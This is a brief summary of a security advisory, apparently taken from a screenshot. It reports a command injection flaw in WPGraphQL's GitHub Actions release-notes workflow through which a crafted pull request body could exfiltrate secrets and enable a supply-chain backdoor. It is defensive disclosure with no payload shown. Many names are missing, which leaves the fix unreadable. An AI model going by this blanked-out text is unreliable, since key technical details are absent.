Key Information from the Screenshot Severity Severity: 7.7/10 (High) Affected Package and Versions Package: Affected versions: <= 2.7.0 Patched versions: None Vulnerability Details Description: The repository contains a GitHub Actions workflow ( ) that is vulnerable to OS command injection via unsanitized GitHub Actions expressions. The vulnerability impacts the repository workflows without requiring users to update WPGraphQL or its extensions. Summary The specific step in that generates release notes uses within a shell block. This allows arbitrary command execution when a pull request from to is merged. Exploitation PoC: A pull request body can be crafted to exfiltrate the secret by including a malicious command within the body. Impacts Secrets at risk: , , Supply chain impact: Compromise could allow publishing a backdoored version affecting thousands of WordPress installations. Recommended Fix Move all expressions from blocks to blocks. Example provided for changing the workflow to mitigate the vulnerability. References Links to related security advisories and similar vulnerabilities in other projects.